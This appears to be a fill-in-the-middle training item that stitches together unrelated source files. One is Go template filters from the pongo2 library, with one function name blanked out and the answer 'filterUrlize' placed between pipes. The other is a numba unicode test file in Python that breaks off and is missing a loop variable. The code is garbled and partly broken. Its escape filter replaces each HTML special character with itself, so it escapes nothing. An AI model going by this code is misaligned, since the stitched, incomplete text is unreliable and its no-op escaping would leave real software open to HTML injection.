tag := ""
idx++ // consume "/"
for idx < vLen {
c2, size2 := utf8.DecodeRuneInString(value[idx:])
if c2 == utf8.RuneError {
idx += size2
continue
}
// End of tag found
if c2 == '>' {
idx++ // consume ">"
break
}
tag += string(c2)
idx += size2
}
if len(tagStack) > 0 {
					// Ideally, the close tag is on top of the tag stack.
					// In malformed HTML it may not be, so iterate through the stack and remove the tag
for i := len(tagStack) - 1; i >= 0; i-- {
if tagStack[i] == tag {
// Found the tag
tagStack[i] = tagStack[len(tagStack)-1]
tagStack = tagStack[:len(tagStack)-1]
break
}
}
}
newOutput.WriteString(tag)
newOutput.WriteString(">")
} else {
// Open tag
tag := ""
params := false
for idx < vLen {
c2, size2 := utf8.DecodeRuneInString(value[idx:])
if c2 == utf8.RuneError {
idx += size2
continue
}
newOutput.WriteRune(c2)
// End of tag found
if c2 == '>' {
idx++ // consume ">"
break
}
if !params {
if c2 == ' ' {
params = true
} else {
tag += string(c2)
}
}
idx += size2
}
// Add tag to stack
tagStack = append(tagStack, tag)
}
}
} else {
idx = fn(c, s, idx)
}
}
finalize()
for i := len(tagStack) - 1; i >= 0; i-- {
tag := tagStack[i]
// Close everything from the regular tag stack
newOutput.WriteString(fmt.Sprintf("</%s>", tag))
}
}
func filterTruncatechars(in *Value, param *Value) (*Value, *Error) {
s := in.String()
newLen := param.Integer()
return AsValue(filterTruncatecharsHelper(s, newLen)), nil
}
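// Illustrative sketch (not part of the original file): invoking a registered filter directly
// through pongo2's ApplyFilter, the same entry point filterUrlizeHelper uses further below.
func exampleTruncateChars() (string, *Error) {
	out, err := ApplyFilter("truncatechars", AsValue("hello pongo2"), AsValue(5))
	if err != nil {
		return "", err
	}
	return out.String(), nil // yields "he..." (5 runes including the ellipsis)
}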
func filterTruncatecharsHTML(in *Value, param *Value) (*Value, *Error) {
value := in.String()
newLen := max(param.Integer()-3, 0)
newOutput := bytes.NewBuffer(nil)
textcounter := 0
filterTruncateHTMLHelper(value, newOutput, func() bool {
return textcounter >= newLen
}, func(c rune, s int, idx int) int {
textcounter++
newOutput.WriteRune(c)
return idx + s
}, func() {
if textcounter >= newLen && textcounter < len(value) {
newOutput.WriteString("...")
}
})
return AsSafeValue(newOutput.String()), nil
}
func filterTruncatewords(in *Value, param *Value) (*Value, *Error) {
words := strings.Fields(in.String())
n := param.Integer()
if n <= 0 {
return AsValue(""), nil
}
nlen := min(len(words), n)
out := make([]string, 0, nlen)
for i := 0; i < nlen; i++ {
out = append(out, words[i])
}
if n < len(words) {
out = append(out, "...")
}
return AsValue(strings.Join(out, " ")), nil
}
func filterTruncatewordsHTML(in *Value, param *Value) (*Value, *Error) {
value := in.String()
newLen := max(param.Integer(), 0)
newOutput := bytes.NewBuffer(nil)
wordcounter := 0
filterTruncateHTMLHelper(value, newOutput, func() bool {
return wordcounter >= newLen
}, func(_ rune, _ int, idx int) int {
// Get next word
wordFound := false
for idx < len(value) {
c2, size2 := utf8.DecodeRuneInString(value[idx:])
if c2 == utf8.RuneError {
idx += size2
continue
}
if c2 == '<' {
// HTML tag start, don't consume it
return idx
}
newOutput.WriteRune(c2)
idx += size2
if c2 == ' ' || c2 == '.' || c2 == ',' || c2 == ';' {
// Word ends here, stop capturing it now
break
} else {
wordFound = true
}
}
if wordFound {
wordcounter++
}
return idx
}, func() {
if wordcounter >= newLen {
newOutput.WriteString("...")
}
})
return AsSafeValue(newOutput.String()), nil
}
func filterEscape(in *Value, param *Value) (*Value, *Error) {
output := strings.Replace(in.String(), "&", "&", -1)
output = strings.Replace(output, ">", ">", -1)
output = strings.Replace(output, "<", "<", -1)
output = strings.Replace(output, "\"", """, -1)
output = strings.Replace(output, "'", "'", -1)
return AsValue(output), nil
}
func filterSafe(in *Value, param *Value) (*Value, *Error) {
return in, nil // nothing to do here, just to keep track of the safe application
}
func filterEscapejs(in *Value, param *Value) (*Value, *Error) {
sin := in.String()
var b bytes.Buffer
idx := 0
for idx < len(sin) {
c, size := utf8.DecodeRuneInString(sin[idx:])
if c == utf8.RuneError {
idx += size
continue
}
if c == '\\' {
// Escape seq?
if idx+1 < len(sin) {
switch sin[idx+1] {
case 'r':
b.WriteString(fmt.Sprintf(`\u%04X`, '\r'))
idx += 2
continue
case 'n':
b.WriteString(fmt.Sprintf(`\u%04X`, '\n'))
idx += 2
continue
/*case '\'':
b.WriteString(fmt.Sprintf(`\u%04X`, '\''))
idx += 2
continue
case '"':
b.WriteString(fmt.Sprintf(`\u%04X`, '"'))
idx += 2
continue*/
}
}
}
if (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || c == ' ' || c == '/' {
b.WriteRune(c)
} else {
b.WriteString(fmt.Sprintf(`\u%04X`, c))
}
idx += size
}
return AsValue(b.String()), nil
}
func filterAdd(in *Value, param *Value) (*Value, *Error) {
if in.IsNumber() && param.IsNumber() {
if in.IsFloat() || param.IsFloat() {
return AsValue(in.Float() + param.Float()), nil
}
return AsValue(in.Integer() + param.Integer()), nil
}
	// If in/param is not a number, we're relying on the
	// Value's String() conversion and just add them both together
return AsValue(in.String() + param.String()), nil
}
func filterAddslashes(in *Value, param *Value) (*Value, *Error) {
output := strings.Replace(in.String(), "\\", "\\\\", -1)
output = strings.Replace(output, "\"", "\\\"", -1)
output = strings.Replace(output, "'", "\\'", -1)
return AsValue(output), nil
}
func filterCut(in *Value, param *Value) (*Value, *Error) {
return AsValue(strings.Replace(in.String(), param.String(), "", -1)), nil
}
func filterLength(in *Value, param *Value) (*Value, *Error) {
return AsValue(in.Len()), nil
}
func filterLengthis(in *Value, param *Value) (*Value, *Error) {
return AsValue(in.Len() == param.Integer()), nil
}
func filterDefault(in *Value, param *Value) (*Value, *Error) {
if !in.IsTrue() {
return param, nil
}
return in, nil
}
func filterDefaultIfNone(in *Value, param *Value) (*Value, *Error) {
if in.IsNil() {
return param, nil
}
return in, nil
}
func filterDivisibleby(in *Value, param *Value) (*Value, *Error) {
if param.Integer() == 0 {
return AsValue(false), nil
}
return AsValue(in.Integer()%param.Integer() == 0), nil
}
func filterFirst(in *Value, param *Value) (*Value, *Error) {
if in.CanSlice() && in.Len() > 0 {
return in.Index(0), nil
}
return AsValue(""), nil
}
func filterFloatformat(in *Value, param *Value) (*Value, *Error) {
val := in.Float()
decimals := -1
if !param.IsNil() {
// Any argument provided?
decimals = param.Integer()
}
	// if the argument is not a number (e.g. empty), the default
	// behaviour is to trim the result
trim := !param.IsNumber()
if decimals <= 0 {
// argument is negative or zero, so we
// want the output being trimmed
decimals = -decimals
trim = true
}
if trim {
// Remove zeroes
if float64(int(val)) == val {
return AsValue(in.Integer()), nil
}
}
return AsValue(strconv.FormatFloat(val, 'f', decimals, 64)), nil
}
func filterGetdigit(in *Value, param *Value) (*Value, *Error) {
i := param.Integer()
l := len(in.String()) // do NOT use in.Len() here!
if i <= 0 || i > l {
return in, nil
}
return AsValue(in.String()[l-i] - 48), nil
}
const filterIRIChars = "/#%[]=:;$&()+,!?*@'~"
func filterIriencode(in *Value, param *Value) (*Value, *Error) {
var b bytes.Buffer
sin := in.String()
for _, r := range sin {
if strings.IndexRune(filterIRIChars, r) >= 0 {
b.WriteRune(r)
} else {
b.WriteString(url.QueryEscape(string(r)))
}
}
return AsValue(b.String()), nil
}
func filterJoin(in *Value, param *Value) (*Value, *Error) {
if !in.CanSlice() {
return in, nil
}
sep := param.String()
sl := make([]string, 0, in.Len())
for i := 0; i < in.Len(); i++ {
sl = append(sl, in.Index(i).String())
}
return AsValue(strings.Join(sl, sep)), nil
}
func filterLast(in *Value, param *Value) (*Value, *Error) {
if in.CanSlice() && in.Len() > 0 {
return in.Index(in.Len() - 1), nil
}
return AsValue(""), nil
}
func filterUpper(in *Value, param *Value) (*Value, *Error) {
return AsValue(strings.ToUpper(in.String())), nil
}
func filterLower(in *Value, param *Value) (*Value, *Error) {
return AsValue(strings.ToLower(in.String())), nil
}
func filterMakelist(in *Value, param *Value) (*Value, *Error) {
s := in.String()
result := make([]string, 0, len(s))
for _, c := range s {
result = append(result, string(c))
}
return AsValue(result), nil
}
func filterCapfirst(in *Value, param *Value) (*Value, *Error) {
if in.Len() <= 0 {
return AsValue(""), nil
}
t := in.String()
r, size := utf8.DecodeRuneInString(t)
return AsValue(strings.ToUpper(string(r)) + t[size:]), nil
}
func filterCenter(in *Value, param *Value) (*Value, *Error) {
width := param.Integer()
slen := in.Len()
if width <= slen {
return in, nil
}
spaces := width - slen
left := spaces/2 + spaces%2
right := spaces / 2
return AsValue(fmt.Sprintf("%s%s%s", strings.Repeat(" ", left),
in.String(), strings.Repeat(" ", right))), nil
}
func filterDate(in *Value, param *Value) (*Value, *Error) {
t, isTime := in.Interface().(time.Time)
if !isTime {
return nil, &Error{
Sender: "filter:date",
ErrorMsg: "Filter input argument must be of type 'time.Time'.",
}
}
return AsValue(t.Format(param.String())), nil
}
func filterFloat(in *Value, param *Value) (*Value, *Error) {
return AsValue(in.Float()), nil
}
func filterInteger(in *Value, param *Value) (*Value, *Error) {
return AsValue(in.Integer()), nil
}
func filterLinebreaks(in *Value, param *Value) (*Value, *Error) {
if in.Len() == 0 {
return in, nil
}
var b bytes.Buffer
// Newline = <br />
// Double newline = <p>...</p>
lines := strings.Split(in.String(), "\n")
lenlines := len(lines)
opened := false
for idx, line := range lines {
if !opened {
b.WriteString("<p>")
opened = true
}
b.WriteString(line)
if idx < lenlines-1 && strings.TrimSpace(lines[idx]) != "" {
// We've not reached the end
if strings.TrimSpace(lines[idx+1]) == "" {
// Next line is empty
if opened {
b.WriteString("</p>")
opened = false
}
} else {
b.WriteString("<br />")
}
}
}
if opened {
b.WriteString("</p>")
}
return AsValue(b.String()), nil
}
func filterSplit(in *Value, param *Value) (*Value, *Error) {
chunks := strings.Split(in.String(), param.String())
return AsValue(chunks), nil
}
func filterLinebreaksbr(in *Value, param *Value) (*Value, *Error) {
return AsValue(strings.Replace(in.String(), "\n", "<br />", -1)), nil
}
func filterLinenumbers(in *Value, param *Value) (*Value, *Error) {
lines := strings.Split(in.String(), "\n")
output := make([]string, 0, len(lines))
for idx, line := range lines {
output = append(output, fmt.Sprintf("%d. %s", idx+1, line))
}
return AsValue(strings.Join(output, "\n")), nil
}
func filterLjust(in *Value, param *Value) (*Value, *Error) {
times := param.Integer() - in.Len()
if times < 0 {
times = 0
}
return AsValue(fmt.Sprintf("%s%s", in.String(), strings.Repeat(" ", times))), nil
}
func filterUrlencode(in *Value, param *Value) (*Value, *Error) {
return AsValue(url.QueryEscape(in.String())), nil
}
// TODO: This regexp could use some work
var filterUrlizeURLRegexp = regexp.MustCompile(`((((http|https)://)|www\.|((^|[ ])[0-9A-Za-z_\-]+(\.com|\.net|\.org|\.info|\.biz|\.de))))(?U:.*)([ ]+|$)`)
var filterUrlizeEmailRegexp = regexp.MustCompile(`(\w+@\w+\.\w{2,4})`)
func filterUrlizeHelper(input string, autoescape bool, trunc int) string {
sout := filterUrlizeURLRegexp.ReplaceAllStringFunc(input, func(raw_url string) string {
var prefix string
var suffix string
if strings.HasPrefix(raw_url, " ") {
prefix = " "
}
if strings.HasSuffix(raw_url, " ") {
suffix = " "
}
raw_url = strings.TrimSpace(raw_url)
t, err := ApplyFilter("iriencode", AsValue(raw_url), nil)
if err != nil {
panic(err)
}
url := t.String()
if !strings.HasPrefix(url, "http") {
url = fmt.Sprintf("http://%s", url)
}
title := raw_url
if trunc > 3 && len(title) > trunc {
title = fmt.Sprintf("%s...", title[:trunc-3])
}
if autoescape {
t, err := ApplyFilter("escape", AsValue(title), nil)
if err != nil {
panic(err)
}
title = t.String()
}
return fmt.Sprintf(`%s<a href="%s" rel="nofollow">%s</a>%s`, prefix, url, title, suffix)
})
sout = filterUrlizeEmailRegexp.ReplaceAllStringFunc(sout, func(mail string) string {
title := mail
if trunc > 3 && len(title) > trunc {
title = fmt.Sprintf("%s...", title[:trunc-3])
}
return fmt.Sprintf(`<a href="mailto:%s">%s</a>`, mail, title)
})
return sout
}
func | (in *Value, param *Value) (*Value, *Error) {
autoescape := true
if param.IsBool() {
autoescape = param.Bool()
}
return AsValue(filterUrlizeHelper(in.String(), autoescape, -1)), nil
}
func filterUrlizetrunc(in *Value, param *Value) (*Value, *Error) {
return AsValue(filterUrlizeHelper(in.String(), true, param.Integer())), nil
}
func filterStringformat(in *Value, param *Value) (*Value, *Error) {
return AsValue(fmt.Sprintf(param.String(), in.Interface())), nil
}
var reStriptags = regexp.MustCompile("<[^>]*?>")
func filterStriptags(in *Value, param *Value) (*Value, *Error) {
s := in.String()
// Strip all tags
s = reStriptags.ReplaceAllString(s, "")
return AsValue(strings.TrimSpace(s)), nil
}
// https://en.wikipedia.org/wiki/Phoneword
var filterPhone2numericMap = map[string]string{
"a": "2", "b": "2", "c": "2", "d": "3", "e": "3", "f": "3", "g": "4", "h": "4", "i": "4", "j": "5", "k": "5",
"l": "5", "m": "6", "n": "6", "o": "6", "p": "7", "q": "7", "r": "7", "s": "7", "t": "8", "u": "8", "v": "8",
"w": "9", "x": "9", "y": "9", "z": "9",
}
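// filterPhone2numeric maps letters to their keypad digits, so an input such
// as "1-800-FLOWERS" (illustrative value) comes out as "1-800-3569377".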
func filterPhone2numeric(in *Value, param *Value) (*Value, *Error) {
sin := in.String()
for k, v := range filterPhone2numericMap {
sin = strings.Replace(sin, k, v, -1)
sin = strings.Replace(sin, strings.ToUpper(k), v, -1)
}
return AsValue(sin), nil
}
func filterPluralize(in *Value, param *Value) (*Value, *Error) {
if in.IsNumber() {
// Works only on numbers
if param.Len() > 0 {
endings := strings.Split(param.String(), ",")
if len(endings) > 2 {
return nil, &Error{
Sender: "filter:pluralize",
ErrorMsg: "You cannot pass more than 2 arguments to filter 'pluralize'.",
}
}
if len(endings) == 1 {
// 1 argument
if in.Integer() != 1 {
return AsValue(endings[0]), nil
}
} else {
if in.Integer() != 1 {
// 2 arguments
return AsValue(endings[1]), nil
}
return AsValue(endings[0]), nil
}
} else {
if in.Integer() != 1 {
// return default 's'
return AsValue("s"), nil
}
}
return AsValue(""), nil
}
return nil, &Error{
Sender: "filter:pluralize",
ErrorMsg: "Filter 'pluralize' does only work on numbers.",
}
}
func filterRandom(in *Value, param *Value) (*Value, *Error) {
if !in.CanSlice() || in.Len() <= 0 {
return in, nil
}
i := rand.Intn(in.Len())
return in.Index(i), nil
}
func filterRemovetags(in *Value, param *Value) (*Value, *Error) {
s := in.String()
tags := strings.Split(param.String(), ",")
// Strip only specific tags
for _, tag := range tags {
re := regexp.MustCompile(fmt.Sprintf("</?%s/?>", tag))
s = re.ReplaceAllString(s, "")
}
return AsValue(strings.TrimSpace(s)), nil
}
func filterRjust(in *Value, param *Value) (*Value, *Error) {
return AsValue(fmt.Sprintf(fmt.Sprintf("%%%ds", param.Integer()), in.String())), nil
}
func filterSlice(in *Value, param *Value) (*Value, *Error) {
comp := strings.Split(param.String(), ":")
if len(comp) != 2 {
return nil, &Error{
Sender: "filter:slice",
ErrorMsg: "Slice string must have the format 'from:to' [from/to can be omitted, but the ':' is required]",
}
}
if !in.CanSlice() {
return in, nil
}
from := AsValue(comp[0]).Integer()
to := in.Len()
if from > to {
from = to
}
vto := AsValue(comp[1]).Integer()
if vto >= from && vto <= in.Len() {
to = vto
}
return in.Slice(from, to), nil
}
func filterTitle(in *Value, param *Value) (*Value, *Error) {
if !in.IsString() {
return AsValue(""), nil
}
return AsValue(strings.Title(strings.ToLower(in.String()))), nil
}
func filterWordcount(in *Value, param *Value) (*Value, *Error) {
return AsValue(len(strings.Fields(in.String()))), nil
}
func filterWordwrap(in *Value, param *Value) (*Value, *Error) {
words := strings.Fields(in.String())
wordsLen := len(words)
wrapAt := param.Integer()
if wrapAt <= 0 {
return in, nil
}
	linecount := (wordsLen + wrapAt - 1) / wrapAt // ceiling division so the final partial line is counted exactly once
lines := make([]string, 0, linecount)
for i := 0; i < linecount; i++ {
lines = append(lines, strings.Join(words[wrapAt*i:min(wrapAt*(i+1), wordsLen)], " "))
}
return AsValue(strings.Join(lines, "\n")), nil
}
func filterYesno(in *Value, param *Value) (*Value, *Error) {
choices := map[int]string{
0: "yes",
1: "no",
2: "maybe",
}
paramString := param.String()
customChoices := strings.Split(paramString, ",")
if len(paramString) > 0 {
if len(customChoices) > 3 {
return nil, &Error{
Sender: "filter:yesno",
ErrorMsg: fmt.Sprintf("You cannot pass more than 3 options to the 'yesno'-filter (got: '%s').", paramString),
}
}
if len(customChoices) < 2 {
return nil, &Error{
Sender: "filter:yesno",
ErrorMsg: fmt.Sprintf("You must pass either no or at least 2 arguments to the 'yesno'-filter (got: '%s').", paramString),
}
}
// Map to the options now
choices[0] = customChoices[0]
choices[1] = customChoices[1]
if len(customChoices) == 3 {
choices[2] = customChoices[2]
}
}
// maybe
if in.IsNil() {
return AsValue(choices[2]), nil
}
// yes
if in.IsTrue() {
return AsValue(choices[0]), nil
}
// no
return AsValue(choices[1]), nil
}
| filterUrlize |
test_unicode.py | # -*- coding: utf-8 -*-
# This file tests Python 3.4 style unicode strings
# Tests should be skipped on Python < 3.4
from __future__ import print_function
import sys
from itertools import permutations
from numba import njit
import numba.unittest_support as unittest
from .support import (TestCase, no_pyobj_flags, MemoryLeakMixin)
from numba.errors import TypingError
_py34_or_later = sys.version_info[:2] >= (3, 4)
def literal_usecase():
return '大处着眼,小处着手。'
def passthrough_usecase(x):
return x
def eq_usecase(x, y):
return x == y
def len_usecase(x):
return len(x)
def getitem_usecase(x, i):
return x[i]
def concat_usecase(x, y):
return x + y
def inplace_concat_usecase(x, y):
x += y
return x
def in_usecase(x, y):
return x in y
def lt_usecase(x, y):
return x < y
def le_usecase(x, y):
return x <= y
def gt_usecase(x, y):
return x > y
def ge_usecase(x, y):
return x >= y
def find_usecase(x, y):
return x.find(y)
def startswith_usecase(x, y):
return x.startswith(y)
def endswith_usecase(x, y):
return x.endswith(y)
def split_usecase(x, y):
return x.split(y)
def split_with_maxsplit_usecase(x, y, maxsplit):
return x.split(y, maxsplit)
def split_with_maxsplit_kwarg_usecase(x, y, maxsplit):
return x.split(y, maxsplit=maxsplit)
def split_whitespace_usecase(x):
return x.split()
def join_usecase(x, y):
return x.join(y)
def join_empty_usecase(x):
# hack to make empty typed list
l = ['']
l.pop()
return x.join(l)
class BaseTest(MemoryLeakMixin, TestCase):
def setUp(self):
super(BaseTest, self).setUp()
UNICODE_EXAMPLES = [
'ascii',
'12345',
'1234567890',
'¡Y tú quién te crees?',
'🐍⚡',
'大处着眼,小处着手。',
]
UNICODE_ORDERING_EXAMPLES = [
'',
    'a',
    'aa',
'aaa',
'b',
'aab',
'ab',
'asc',
'ascih',
'ascii',
'ascij',
'大处着眼,小处着手',
'大处着眼,小处着手。',
'大处着眼,小处着手。🐍⚡',
]
@unittest.skipUnless(_py34_or_later,
'unicode support requires Python 3.4 or later')
class TestUnicode(BaseTest):
def test_literal(self, flags=no_pyobj_flags):
pyfunc = literal_usecase
self.run_nullary_func(pyfunc, flags=flags)
def test_passthrough(self, flags=no_pyobj_flags):
pyfunc = passthrough_usecase
cfunc = njit(pyfunc)
for s in UNICODE_EXAMPLES:
self.assertEqual(pyfunc(s), cfunc(s))
def test_eq(self, flags=no_pyobj_flags):
pyfunc = eq_usecase
cfunc = njit(pyfunc)
for a in UNICODE_EXAMPLES:
for b in reversed(UNICODE_EXAMPLES):
self.assertEqual(pyfunc(a, b),
cfunc(a, b), '%s, %s' % (a, b))
def _check_ordering_op(self, usecase):
pyfunc = usecase
cfunc = njit(pyfunc)
# Check comparison to self
for a in UNICODE_ORDERING_EXAMPLES:
self.assertEqual(
pyfunc(a, a),
cfunc(a, a),
'%s: "%s", "%s"' % (usecase.__name__, a, a),
)
# Check comparison to adjacent
for a, b in permutations(UNICODE_ORDERING_EXAMPLES, r=2):
self.assertEqual(
pyfunc(a, b),
cfunc(a, b),
'%s: "%s", "%s"' % (usecase.__name__, a, b),
)
# and reversed
self.assertEqual(
pyfunc(b, a),
cfunc(b, a),
'%s: "%s", "%s"' % (usecase.__name__, b, a),
)
def test_lt(self, flags=no_pyobj_flags):
self._check_ordering_op(lt_usecase)
def test_le(self, flags=no_pyobj_flags):
self._check_ordering_op(le_usecase)
def test_gt(self, flags=no_pyobj_flags):
self._check_ordering_op(gt_usecase)
def test_ge(self, flags=no_pyobj_flags):
self._check_ordering_op(ge_usecase)
def test_len(self, flags=no_pyobj_flags):
pyfunc = len_usecase
cfunc = njit(pyfunc)
for s in UNICODE_EXAMPLES:
self.assertEqual(pyfunc(s), cfunc(s))
def test_startswith(self, flags=no_pyobj_flags):
pyfunc = startswith_usecase
cfunc = njit(pyfunc)
for a in UNICODE_EXAMPLES:
            for b in ['', 'x', a[:-2], a[3:], a, a + a]:
self.assertEqual(pyfunc(a, b),
cfunc(a, b),
'%s, %s' % (a, b))
def test_endswith(self, flags=no_pyobj_flags):
pyfunc = endswith_usecase
cfunc = njit(pyfunc)
for a in UNICODE_EXAMPLES:
            for b in ['', 'x', a[:-2], a[3:], a, a + a]:
self.assertEqual(pyfunc(a, b),
cfunc(a, b),
'%s, %s' % (a, b))
def test_in(self, flags=no_pyobj_flags):
pyfunc = in_usecase
cfunc = njit(pyfunc)
for a in UNICODE_EXAMPLES:
extras = ['', 'xx', a[::-1], a[:-2], a[3:], a, a + a]
            for substr in extras:
self.assertEqual(pyfunc(substr, a),
cfunc(substr, a),
"'%s' in '%s'?" % (substr, a))
def test_find(self, flags=no_pyobj_flags):
pyfunc = find_usecase
cfunc = njit(pyfunc)
for a in UNICODE_EXAMPLES:
extras = ['', 'xx', a[::-1], a[:-2], a[3:], a, a + a]
            for substr in extras:
self.assertEqual(pyfunc(a, substr),
cfunc(a, substr),
"'%s'.find('%s')?" % (a, substr))
def test_getitem(self):
pyfunc = getitem_usecase
cfunc = njit(pyfunc)
for s in UNICODE_EXAMPLES:
            for i in range(-len(s), len(s)):
self.assertEqual(pyfunc(s, i),
cfunc(s, i),
"'%s'[%d]?" % (s, i))
def test_getitem_error(self):
self.disable_leak_check()
pyfunc = getitem_usecase
cfunc = njit(pyfunc)
for s in UNICODE_EXAMPLES:
with self.assertRaises(IndexError) as raises:
pyfunc(s, len(s))
self.assertIn('string index out of range', str(raises.exception))
with self.assertRaises(IndexError) as raises:
cfunc(s, len(s))
self.assertIn('string index out of range', str(raises.exception))
def test_slice2(self):
pyfunc = getitem_usecase
cfunc = njit(pyfunc)
for s in UNICODE_EXAMPLES:
for i in list(range(-len(s), len(s))):
for j in list(range(-len(s), len(s))):
sl = slice(i, j)
self.assertEqual(pyfunc(s, sl),
cfunc(s, sl),
"'%s'[%d:%d]?" % (s, i, j))
def test_slice2_error(self):
pyfunc = getitem_usecase
cfunc = njit(pyfunc)
for s in UNICODE_EXAMPLES:
for i in [-2, -1, len(s), len(s) + 1]:
for j in [-2, -1, len(s), len(s) + 1]:
sl = slice(i, j)
self.assertEqual(pyfunc(s, sl),
cfunc(s, sl),
"'%s'[%d:%d]?" % (s, i, j))
def test_slice3(self):
pyfunc = getitem_usecase
cfunc = njit(pyfunc)
for s in UNICODE_EXAMPLES:
for i in range(-len(s), len(s)):
for j in range(-len(s), len(s)):
for k in [-2, -1, 1, 2]:
sl = slice(i, j, k)
self.assertEqual(pyfunc(s, sl),
cfunc(s, sl),
"'%s'[%d:%d:%d]?" % (s, i, j, k))
def test_slice3_error(self):
pyfunc = getitem_usecase
cfunc = njit(pyfunc)
for s in UNICODE_EXAMPLES:
for i in [-2, -1, len(s), len(s) + 1]:
for j in [-2, -1, len(s), len(s) + 1]:
for k in [-2, -1, 1, 2]:
sl = slice(i, j, k)
self.assertEqual(pyfunc(s, sl),
cfunc(s, sl),
"'%s'[%d:%d:%d]?" % (s, i, j, k))
def test_concat(self, flags=no_pyobj_flags):
pyfunc = concat_usecase
cfunc = njit(pyfunc)
for a in UNICODE_EXAMPLES:
for b in UNICODE_EXAMPLES[::-1]:
self.assertEqual(pyfunc(a, b),
cfunc(a, b),
"'%s' + '%s'?" % (a, b))
def test_split_exception_empty_sep(self):
self.disable_leak_check()
pyfunc = split_usecase
cfunc = njit(pyfunc)
# Handle empty separator exception
for func in [pyfunc, cfunc]:
with self.assertRaises(ValueError) as raises:
func('a', '')
self.assertIn('empty separator', str(raises.exception))
def test_split_exception_noninteger_maxsplit(self):
pyfunc = split_with_maxsplit_usecase
cfunc = njit(pyfunc)
| with self.assertRaises(TypingError) as raises:
cfunc('a', sep, 2.4)
self.assertIn('float64', str(raises.exception),
'non-integer maxsplit with sep = %s' % sep)
def test_split(self):
pyfunc = split_usecase
cfunc = njit(pyfunc)
CASES = [
(' a ', None),
('', '⚡'),
('abcabc', '⚡'),
('🐍⚡', '⚡'),
('🐍⚡🐍', '⚡'),
('abababa', 'a'),
('abababa', 'b'),
('abababa', 'c'),
('abababa', 'ab'),
('abababa', 'aba'),
]
for test_str, splitter in CASES:
self.assertEqual(pyfunc(test_str, splitter),
cfunc(test_str, splitter),
"'%s'.split('%s')?" % (test_str, splitter))
def test_split_with_maxsplit(self):
CASES = [
(' a ', None, 1),
('', '⚡', 1),
('abcabc', '⚡', 1),
('🐍⚡', '⚡', 1),
('🐍⚡🐍', '⚡', 1),
('abababa', 'a', 2),
('abababa', 'b', 1),
('abababa', 'c', 2),
('abababa', 'ab', 1),
('abababa', 'aba', 5),
]
for pyfunc, fmt_str in [(split_with_maxsplit_usecase, "'%s'.split('%s', %d)?"),
(split_with_maxsplit_kwarg_usecase, "'%s'.split('%s', maxsplit=%d)?")]:
cfunc = njit(pyfunc)
for test_str, splitter, maxsplit in CASES:
self.assertEqual(pyfunc(test_str, splitter, maxsplit),
cfunc(test_str, splitter, maxsplit),
fmt_str % (test_str, splitter, maxsplit))
def test_split_whitespace(self):
# explicit sep=None cases covered in test_split and test_split_with_maxsplit
pyfunc = split_whitespace_usecase
cfunc = njit(pyfunc)
#list copied from https://github.com/python/cpython/blob/master/Objects/unicodetype_db.h
all_whitespace = ''.join(map(chr, [
0x0009, 0x000A, 0x000B, 0x000C, 0x000D, 0x001C, 0x001D, 0x001E, 0x001F, 0x0020,
0x0085, 0x00A0, 0x1680, 0x2000, 0x2001, 0x2002, 0x2003, 0x2004, 0x2005, 0x2006,
0x2007, 0x2008, 0x2009, 0x200A, 0x2028, 0x2029, 0x202F, 0x205F, 0x3000
]))
CASES = [
'',
'abcabc',
'🐍 ⚡',
'🐍 ⚡ 🐍',
'🐍 ⚡ 🐍 ',
' 🐍 ⚡ 🐍',
' 🐍' + all_whitespace + '⚡ 🐍 ',
]
for test_str in CASES:
self.assertEqual(pyfunc(test_str),
cfunc(test_str),
"'%s'.split()?" % (test_str,))
def test_join_empty(self):
# Can't pass empty list to nopython mode, so we have to make a
# separate test case
pyfunc = join_empty_usecase
cfunc = njit(pyfunc)
CASES = [
'',
'🐍🐍🐍',
]
for sep in CASES:
self.assertEqual(pyfunc(sep),
cfunc(sep),
"'%s'.join([])?" % (sep,))
def test_join_non_string_exception(self):
# Verify that join of list of integers raises typing exception
pyfunc = join_usecase
cfunc = njit(pyfunc)
# Handle empty separator exception
with self.assertRaises(TypingError) as raises:
cfunc('', [1,2,3])
# This error message is obscure, but indicates the error was trapped in typing of str.join()
# Feel free to change this as we update error messages.
exc_message = str(raises.exception)
self.assertIn("Invalid use of BoundFunction", exc_message)
self.assertIn("(reflected list(int", exc_message) # could be int32 or int64
def test_join(self):
pyfunc = join_usecase
cfunc = njit(pyfunc)
CASES = [
('', ['', '', '']),
('a', ['', '', '']),
('', ['a', 'bbbb', 'c']),
('🐍🐍🐍', ['⚡⚡'] * 5),
]
for sep, parts in CASES:
self.assertEqual(pyfunc(sep, parts),
cfunc(sep, parts),
"'%s'.join('%s')?" % (sep, parts))
def test_join_interleave_str(self):
# can pass a string as the parts iterable
pyfunc = join_usecase
cfunc = njit(pyfunc)
CASES = [
('abc', '123'),
('🐍🐍🐍', '⚡⚡'),
]
for sep, parts in CASES:
self.assertEqual(pyfunc(sep, parts),
cfunc(sep, parts),
"'%s'.join('%s')?" % (sep, parts))
def test_inplace_concat(self, flags=no_pyobj_flags):
pyfunc = inplace_concat_usecase
cfunc = njit(pyfunc)
for a in UNICODE_EXAMPLES:
for b in UNICODE_EXAMPLES[::-1]:
self.assertEqual(pyfunc(a, b),
cfunc(a, b),
"'%s' + '%s'?" % (a, b))
def test_pointless_slice(self, flags=no_pyobj_flags):
def pyfunc(a):
return a[:]
cfunc = njit(pyfunc)
args = ['a']
self.assertEqual(pyfunc(*args), cfunc(*args))
def test_walk_backwards(self, flags=no_pyobj_flags):
def pyfunc(a):
return a[::-1]
cfunc = njit(pyfunc)
args = ['a']
self.assertEqual(pyfunc(*args), cfunc(*args))
def test_stride_slice(self, flags=no_pyobj_flags):
def pyfunc(a):
return a[::2]
cfunc = njit(pyfunc)
args = ['a']
self.assertEqual(pyfunc(*args), cfunc(*args))
def test_basic_lt(self, flags=no_pyobj_flags):
def pyfunc(a, b):
return a < b
cfunc = njit(pyfunc)
args = ['ab', 'b']
self.assertEqual(pyfunc(*args), cfunc(*args))
def test_basic_gt(self, flags=no_pyobj_flags):
def pyfunc(a, b):
return a > b
cfunc = njit(pyfunc)
args = ['ab', 'b']
self.assertEqual(pyfunc(*args), cfunc(*args))
def test_comparison(self):
def pyfunc(option, x, y):
if option == '==':
return x == y
elif option == '!=':
return x != y
elif option == '<':
return x < y
elif option == '>':
return x > y
elif option == '<=':
return x <= y
elif option == '>=':
return x >= y
else:
return None
cfunc = njit(pyfunc)
for x, y in permutations(UNICODE_ORDERING_EXAMPLES, r=2):
for cmpop in ['==', '!=', '<', '>', '<=', '>=', '']:
args = [cmpop, x, y]
self.assertEqual(pyfunc(*args), cfunc(*args),
msg='failed on {}'.format(args))
def test_literal_concat(self):
